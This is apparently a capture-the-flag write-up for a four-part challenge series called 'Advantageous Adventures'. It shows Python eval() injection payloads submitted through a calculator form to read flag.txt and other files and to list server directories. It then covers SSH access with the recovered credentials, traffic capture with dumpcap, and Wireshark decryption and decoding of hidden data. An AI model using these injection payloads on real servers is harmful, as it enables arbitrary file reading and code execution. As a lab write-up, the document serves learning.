Advantageous Adventures
First Bloods :)
Managed to do up to AA-2 before I had to sleep as I had work the next day.
Woke up to solve AA-3 and AA-4!
AA 1
The page offers a bunch of math calculators. Testing some simple payloads revealed that the backend was using Python's eval()
to generate the results.
Now, if we are going to read a flag, we are most probably going to be dealing with strings. If we are dealing with strings, one of the math operators is more useful than others: the +
operator is the concatenation operator in Python.
Using the simple payload val1=''&val2=open('flag.txt').read()
, we can make the server return the contents of flag.txt
.
AA 2
Did you get what you needed from Advantageous Adventures 1? You'll need a username and password from the first challenge to proceed. I heard that the Advantageous Adventures team was using what you received to communicate on a low level. Can you figure out how they're talking?
All info for this challenge must be derived from Advantageous Adventures 1.
Solution
We can import the os module.
val1=''&val2=str(__import__('os').listdir())
The result: ['__pycache__', 'static', 'secret_script.py', 'secret_info', 'flag.txt', 'app.py', 'README.md', 'templates', 'Dockerfile']
secret_script.py
val1=''&val2=open('secret_script.py').read()
secret_info
app.py
We can SSH into the server using the credentials obtained above: ssh user@chals1.umdctf.io -p 3001
We can use dumpcap
to capture the network traffic.
Capture 2000+ packets on the WiFi interface: dumpcap -i wlo2 -P
After running the secret_script.py
, transfer the out.pcap
out using scp
:
scp -P 3001 user@chals1.umdctf.io:/home/ubuntu/out.pcap .
Open in Wireshark, and we have our flag!
AA 3
In Wireshark, we can decrypt the wireless traffic with the WiFi password found previously. This reveals another flag hidden in the data of the subsequent packets.
AA 4
Shortly below the above flag, we can see lots of packets with repeated numbers, starting from 0000...
, 1111...
, 2222...
, and so on. The number itself probably doesn't mean much - we're looking for a string. But the length (i.e. number of repeated numbers) varies for each packet. This could be one way to encode data.
In Wireshark: Export packets as JSON. Then we can run a script to extract the flag:
Last updated